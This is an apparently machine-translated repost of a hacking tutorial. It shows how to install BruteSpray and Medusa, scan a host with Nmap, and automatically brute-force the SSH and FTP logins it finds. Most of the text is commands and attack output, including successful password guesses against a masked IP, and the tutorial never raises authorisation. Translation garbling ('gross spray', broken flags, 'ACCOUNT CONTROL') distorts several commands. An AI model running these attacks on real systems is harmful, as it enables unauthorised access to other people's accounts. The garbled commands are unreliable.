قالب وردپرس درنا توس
Home / Tips and Tricks / Automating Brute Force Attacks for Nmap Scans «Null Byte :: WonderHowTo

Automating Brute Force Attacks for Nmap Scans «Null Byte :: WonderHowTo



It is frustrating and confusing to use Hydra, Ncrack and other brute-forcing tools to crack passwords. Let us discuss the automation and optimization of brute force attacks for potentially vulnerable services such as SMTP, SSH, IMAP and FTP, discovered by Nmap, a popular network scanning tool, to facilitate the process.

BruteSpray, developed by Jacob Robles and Shane Young is a Python script capable of processing an Nmap scan output and automating brute force attacks against discovered services using Medusa, a popular tool for brute forcing. BruteSpray is the much needed combination that unites Nmap scans and brute force attacks.

Step 1: Set up BruteSpray and Medusa

An older version of BruteSpray can be found in the Kali repositories. To avoid potential confusion, any version of BruteSpray that is already installed must be removed with the command below apt-get .

  ~ $ apt-get autoremove brute spray

Read package lists ... Ready
Build dependency structure
Read status information ... Done
Package & # 39; gross spray & # 39; is not installed, so not deleted
The following packages are DELETED:
libgit2-27
0 upgraded, 0 newly installed, 1 to remove and 1841 not upgraded.
After this operation, 1,073 kB of disk space is freed up.
Do you want to continue? [Y/n] Y
(Read database ... 417689 files and folders that are currently installed.)
Delete libgit2-27: amd64 (0.27.7 + dfsg.1-0.2 + b1) ...
Processing triggers for libc-bin (2.29-3) ... 

Next, clone the BruteSpray repository.

  ~ $ git clone https://github.com/x90skysn3k/brutespray.git

Clones in & # 39; gross spray & # 39; ...
remote: list items: 15, done.
external: objects count: 100% (15/15), ready.
external: compress objects: 100% (15/15), ready.
remote: Total 506 (delta 4), reused 1 (delta 0), pack reused 491
Receiving objects: 100% (506/506), 113.29 KiB | 2.31 MiB / s, ready.
Delta & # 39; s solution: 100% (211/211), ready. 

Next, cd in the "brute spray" folder and use pip a tool for installing and managing Python packages, to install BruteSpray dependencies.

  ~ $ brutespray cd / 

The following command is required to run BruteSpray. The argument -r instructs pip to install the dependencies in the "requirements.txt" file.

  ~ / gross spray $ pip install -r requirements.txt

Collecting Argcomplete == 1.10.0
Download https://files.pythonhosted.org/packages/4d/82/f44c9661e479207348a979b1f6f063625d11dc4ca6256af053719bbb0124/argcomplete-1.10.0-py2.py3-none-any.whl
Installing collected packages: argcomplete
Argcomplete-1.10.0 installed 

Finally, install Medusa. This can be done with the command below.

  ~ / gross spray $ apt-get install medusa

Read package lists ... Ready
Build dependency structure
Read status information ... Done
The following packages are being upgraded:
jellyfish
1 upgraded, 0 newly installed, 0 to remove and 1840 not upgraded.
Must have 0 B / 154 kB of archives.
After this operation, 27.6 kB of disk space is freed up.
Read changes ... Ready
(Read database ... 417682 files and folders that are currently installed.)
Preparation for unpacking ... / medusa_2.2-6 + b1_amd64.deb ...
Unpacking Medusa (2.2-6 + b1) over (2.2-6) ...
Setting up Medusa (2.2-6 + b1) ...
Processing triggers for man-db (2.8.5-2) ... 

The argument – help can be used to check whether BruteSpray works correctly and to view the available options.

  ~ / gross spray $ ./brutespray.py --help

# @ @ /
@@@ @@@
% @@@ @@@.
@@@@@ @@@@%
@@@@@ @@@@@
@@@@@@@ @ @@@@@@@@
@ (@@@@@@@%% @@@@@@@ @ @@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
@@ * @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@
@@@ (@@@@@ # @@@@@@@@@ * @@@, @@@@@@@@@@@@@@@ @@@
@@@@@@. @@@ / @@@@@@@@@@@@ @@@@@@@@@@@@
@@@ @@@@@@@@@@@ @@@
@@@@ *, @@@@@@@@@ (, @@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@. @@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@ @@@@@ @@@@@@@@@@@@@
@@@@@@@@@@@@@@@@
@@ @@@ @@
@@ @@@@@@@ @@
@@% @ @@

██████╗ ██████╗ ██╗ ██╗████████╗███████╗███████╗█████ █╗ ██████╗ █████╗ ██╗ ██╗
██║╚══██╔══╝██╔════╝██╔════╝██╔ ██║╚══██╔══╝██╔════╝██╔════╝██╔ ██╔╝ ██╔╝
██████╔╝██████╔╝██║ ██║ ██║ █████╗ ███████╗██████╔╝███ ╚████╔╝ ╚████╔╝
██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝ ╚════██║██╔═══╝ ██╔═ ╚██╔╝ ╚██╔╝
██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗███████║██║ ██║ ██ ██║ ██║ ██║
╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝╚═ ╚═╝ ╚═╝ ╚═╝

brutespray.py v1.6.6
Created by: Shane Young / @ x90skysn3k && Jacob Robles / @ shellfail
Inspired by: Leon Johnson / @ sho-luv
Thanks to Medusa: JoMo-Kun / Foofus Networks 

usage: brutespray.py [-h] [-f FILE] [-o OUTPUT] [-s SERVICE] [-t THREADS]
                     [-T HOSTS] [-U USERLIST] [-P PASSLIST] [-u USERNAME]
                     [-p PASSWORD] [-c] [-i] [-m]

  usage: python brutespray.py 

optional arguments:
-h, - help view and close this help message

Menu options:
-f FILE, - file FILE GNMAP, JSON or XML file for parsing
-o OUTPUT, - OUTPUT output
Directory with successful attempts
-s SERVICE, --service SERVICE
specify the service to be attacked
-T THREAD, - thanks THREAD
number of medusa threads
-T HOSTS, --hosts HOSTS
number of hosts to test simultaneously
-U USERLIST, --userlist USERLIST
refer to a custom username file
-P PASSLIST, --passlist PASSLIST
refer to a custom password file
-u USERNAME, --username USERNAME
enter a single username
-p PASSWORD, - password PASSWORD
enter a single password
-c, - remain brutal forcing after success
-i, - interactive interactive mode
-m, - modules dump a list of available modules to brutally 

That's it for downloading BruteSpray and installing dependencies – no adjustments or configurations are needed.

Other requirements that may be useful to follow along with this tutorial are: Nmap (of course), a general understanding of how Nmap works, and a simple glossary for password-guessing attacks. Nmap can be installed and downloaded with the command below, if you do not have it yet.

  ~ / gross spray $ apt-get install nmap

Read package lists ... Ready
Build dependency structure
Read status information ... Done
The following package is installed automatically and is no longer required:
liblinear3
Use & # 39; apt autoremove & # 39; to delete it.
The following additional packages are installed:
liblinear4 nmap-common
Suggested packages:
liblinear-tools liblinear-dev ncat
The following NEW packages are installed:
liblinear4
The following packages are being upgraded:
nmap nmap-common
2 upgraded, 1 newly installed, 0 to remove and 1838 not upgraded.
Must receive 43.6 kB / 5,999 kB in archives.
After this operation, an additional 309 KB of disk space is used.
Do you want to continue? [Y/n] Y
Receive: 1 http://archive.linux.duke.edu/kalilinux/kali kali-rolling / main amd64 liblinear4 amd64 2.3.0 + dfsg-3 [43.6 kB]
43.6 kB retrieved in 1 second (32.2 kB / s)
Read changes ... Ready
Previously unselected package select liblinear4: amd64.
(Read database ... 417683 files and folders that are currently installed.)
Preparation for unpacking ... / liblinear4_2.3.0 + dfsg-3_amd64.deb ...
Unpacking Liblinear4: amd64 (2.3.0 + dfsg-3) ...
Preparation for unpacking ... / nmap_7.80 + dfsg1-2kali1_amd64.deb ...
Extract nmap (7.80 + dfsg1-2kali1) over (7.70 + dfsg1-6kali1) ...
Preparation for unpacking ... / nmap-common_7.80 + dfsg1-2kali1_all.deb ...
Extract Nmap-Common (7.80 + dfsg1-2kali1) over (7.70 + dfsg1-6kali1) ...
Set up Liblinear4: amd64 (2.3.0 + dfsg-3) ...
Set nmap-common (7.80 + dfsg1-2kali1) ...
Set nmap (7.80 + dfsg1-2kali1) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for libc-bin (2.29-3) ... 

The glossary that I use in this manual can be downloaded with the following command. You can of course use any desired word list from leaked password databases, other online word lists or from custom tools for building word lists such as Mentalist, CeWL and Crunch.

  ~ / gross spray $ wget & # 39; https: // raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt'

--2020-01-13 18: 59: 31-- https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Resolving Raw.githubusercontent.com (raw.githubusercontent.com) ... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connect to raw.githubusercontent.com (raw.githubusercontent.com) | 151.101.0.133 |: 443 ... connected.
HTTP request sent, awaiting response ... 200 OK
Length: 25585 (25K) [text/plain]
Save in: "1wordlist2rulethem@ll.txt"

1wordlist2rulethem @ 100% [===================>] 24.99K - .- KB / s in 0.04 sec

2020-01-13 18:59:31 (645 KB / s) - "1wordlist2rulethem@ll.txt" saved [25585/25585]

Step 2: Generate Nmap output files

BruteSpray requires an Nmap output file to function. These files can be created using Nmap & # 39; s -oX or -oG arguments as shown in the Nmap command below. The -sV means that it will investigate open ports to determine service and version information.

The use of -oG is the most important argument here. It stores the Nmap output in a local file in grepable format. This allows BruteSpray to effectively process the services and ports on the target server. Similarly, the argument -oX stores the Nmap output in an XML output, which is also supported by BruteSpray but less readable to humans.

  ~ / gross spray $ nmap -sVTU -p ports TargetServer -oG filename.gnmap 

Here is my example of this command and the output:

  ~ / gross spray $ nmap -sVTU -p21,22,137,161 1X. XXX.XXX.103 -oG tokyoneon.gnmap

Start Nmap 7.80 (https://nmap.org)
Nmap scan report for 1X.XXX.XXX.103
Host is up (0.00018s latency).

PORT STATE SERVICE VERSION
21 / tcp open ftp vsftpd 3.0.3
22 / tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
137 / tcp closed net bios
161 / tcp closed snmp
21 ftp closed ftp
22 / udp closed ssh
137 / udp open netbios-ns Samba nmbd netbios-ns (working group: WORKGROUP)
161 / udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
MAC address: 6C: DB: XX: XX: XX: XX (XXXXX)
Service information: Host: XXXXX; Operating systems: Unix, Linux; CPE: cpe: / o: linux: linux_kernel

Service detection performed. Report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds 

Replace "ports" above with the ports you want to scan, "TargetServer" with the IP address of your target and "file name" with the name that you want to give the file. Once done, the newly created .gnmap file can be viewed with the command cat .

  ~ / brutespray $ cat filename.gnmap 

For me, after executing my example command:

  ~ / brutespray $ cat tokyoneon.gnmap

# Nmap 7.80 scan started Thu 12 Apr 18:34:07 2018 as: nmap -sVTU -p21,22,137,161 -oG tokyoneon.gnmap 1X.XXX.XXX.103
Host: 1X.XXX.XXX.103 () Status: Up
Host: 1X.XXX.XXX.103 () Ports: 21 / open / tcp // ftp // vsftpd 3.0.3 /, 22 / open / tcp // ssh // OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) /, 137 / closed / tcp // netbios-ns ///, 161 / closed / tcp // snmp ///, 21 / closed / udp // ftp ///, 22 / closed / udp // ssh ///, 137 / open / udp // netbios-ns // Samba nmbd netbios-ns (workgroup: WORKGROUP) /, 161 / open / udp // snmp // SNMPv1 server; net-snmp SNMPv3 server (public WORKGROUP) /
# Nmap done on Thu 12 Apr. 18:35:55 ​​2018-1 IP address (1 host up) scanned in 0.60 seconds 

Note the "open" ports that Nmap has discovered, since these services are now available for automated brutal attacks

Step 3: Automate Brute Force attacks with BruteSpray

BruteSpray currently supports nearly two dozen services by default. The supported services can be viewed with the argument – modules . They include SSH, FTP, Telnet, VNC, MsSQL, MySQL, PostgreSQL, RSH, IMAP, NNTP, pcAnywhere, POP3, rexec, rlogin, SMBNT, SMTP, SVN, vmauthd and SNMP.

  ~ / gross spray $ ./ gross spray.py - modules

Created by: Shane Young / @ x90skysn3k && Jacob Robles / @ shellfail
Supported services:

ssh
ftp
telnet
vnc
mssql
mysql
postgresql
rsh
imap
nntp
pcanywhere
pop3
rexec
rlogin
smbnt
smtp
svn
vmauthd
SNMP 

1. Interactive mode

The argument -i can be used to enable an interactive mode a guided mode designed to maximize ease of use.

  ~ / brutespray $ ./ brutespray.py - file filename.gnmap -i

--------------------------------------------

./brutespray.py - file tokyoneon.gnmap -i

Created by: Shane Young / @ x90skysn3k && Jacob Robles / @ shellfail

Welcome to the interactive mode!

WARNING: If you leave an option empty, it will remain empty and the default setting will be used

Available services for brute force:
Service: ftp on port 21 with 1 hosts
Service: snmp on port 161 with 1 hosts
Service: SSH on port 22 with 1 hosts

Enter services that you want to brutally - by default everything (ssh, ftp, etc.): 

Simply follow the prompts and the brute-force attack will begin.

  Enter services that you want to brut - by default all (ssh, ftp, etc.): ftp
Enter the number of parallel threads (the default is 2): 1
Enter the number of parallel hosts to be scanned per service (default is 1): 1
Do you want to specify a word list? (y / n): n
Would specify a single username or password (y / n): y
Enter a username: user
Fill in a password:

If you start brutally, make sure you use the correct amount of threads (-t) and parallel hosts (-T) ...
Output is written to the folder: ./brutespray-output/ 

Brute-forcing ...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: 123456 (1 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: 123456789 (2 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: password (3 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: success (4 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: asdfghjkl (5 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: 11111111 (6 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: iloveyou (7 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: letmein (8 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: wonderhow2 (9 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 User: user Password: wonderhow2 [SUCCESS]

2. Target Individual Services

Targeting a single service can be achieved using the argument – service and specifying the protocol. If the argument – username is not specified when using service BruteSpray uses the default user list in the glossary / ssh / user file. This list of user names can be changed at any time.

  ~ / gross spray $ ./brutespray.py - file filename.gnmap --service ssh

--------------------------------------------

./brutespray.py - file tokyoneon.gnmap --service ssh

Created by: Shane Young / @ x90skysn3k && Jacob Robles / @ shellfail

If you start brutally, make sure you use the correct amount of threads (-t) and parallel hosts (-T) ...
Output is written to the folder: ./brutespray-output/ 

Brute-forcing ...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: 123456 (1 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: 123456789 (2 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: password (3 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: success (4 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: asdfghjkl (5 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: 11111111 (6 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: iloveyou (7 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 0 completed) Password: letmein (8 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: root (1 of 3, 1 completed) Password: wonderhow2 (9 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (2 of 3, 1 completed) Password: 123456 (1 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (2 of 3, 1 completed) Password: 123456789 (2 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (2 of 3, 1 completed) Password: 123456 (1 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (2 of 3, 1 completed) Password: password (3 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (2 of 3, 1 completed) Password: 123456789 (2 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (2 of 3, 1 completed) Password: password (3 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (2 of 3, 1 completed) Password: success (4 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (2 of 3, 1 completed) Password: asdfghjkl (5 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (2 of 3, 1 completed) Password: success (4 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (3 of 3, 1 completed) Password: 11111111 (6 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (3 of 3, 1 completed) Password: asdfghjkl (5 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (3 of 3, 1 completed) Password: 11111111 (6 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (3 of 3, 1 completed) Password: iloveyou (7 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (3 of 3, 1 completed) Password: letmein (8 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (3 of 3, 1 completed) Password: iloveyou (7 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: admin (3 of 3, 1 completed) Password: wonderhow2 (9 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (3 of 3, 2 completed) Password: letmein (8 of 9 completed)
ACCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (3 of 3, 2 completed) Password: wonderhow2 (9 of 9 completed)

CCOUNT CONTROL: [ssh] Host: 1X.XXX.XXX.103 User: user Password: wonderhow2 [SUCCESS]

3. Configuring custom word lists and user names (optional)

There are small built-in word lists and user lists that are automatically used when a particular service is brutally forced. The file & # 39; password & # 39; in the glossary / ssh / directory, for example, contains passwords that are used when brutally forcing SSH services. Each supported service has its own specific folder in the dictionary / folder.

  ~ / gross spray $ ls -F glossary /

ftp / mssql / nntp / postgres / rlogin / smbnt / ssh / telnet / vnc /
imap / mysql / pcanywhere / rexec / rsh / smtp / svn / vmauthd / 

It would be possible to manually change the built-in word lists using the cp command to copy over a custom word list . [19659005] ~ / brutespray $ cp /path/to/customPasswords.list glossary / ssh / password

Built-in username lists can also be changed with the command below.

  ~ / gross spray $ cp / path / to / customUser.list glossary / vnc / user 

Alternatively, custom password and user name lists can be used from the command line with arguments – passlist and – username .

  ~ / brutespray $ ./brutespray.py --file filename.gnmap --username UsernameHere --passlist /path/to/desired/passwords.list --service ftp

-------------------------------------------------- -------------------------------------------------- -------------------

./brutespray.py - file tokyoneon.gnmap --passlist /root/to/Desktop/passwords.list --service ftp

Created by: Shane Young / @ x90skysn3k && Jacob Robles / @ shellfail
If you start brutally, make sure you use the correct amount of threads (-t) and parallel hosts (-T) ...
Output is written to the folder: ./brutespray-output/ 

Brute-forcing ...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: 123456 (1 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: 123456789 (2 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: password (3 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: success (4 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: asdfghjkl (5 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: 11111111 (6 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: iloveyou (7 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: letmein (8 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 completed) User: user (1 of 1, 0 completed) Password: wonderhow2 (9 of 9 completed)
ACCOUNT CONTROL: [ftp] Host: 1X.XXX.XXX.103 User: user Password: wonderhow2 [SUCCESS] 

These are just a few examples. If you need more help with this, save me in the comments below or on Twitter @tokyoneon_ .

Don't miss it: How easy to detect CPUs with Nmap scripts [19659056] Cover photo by Jefferson Santos / PEXELS and Screenshots by tokyoneon / Null Byte




Source link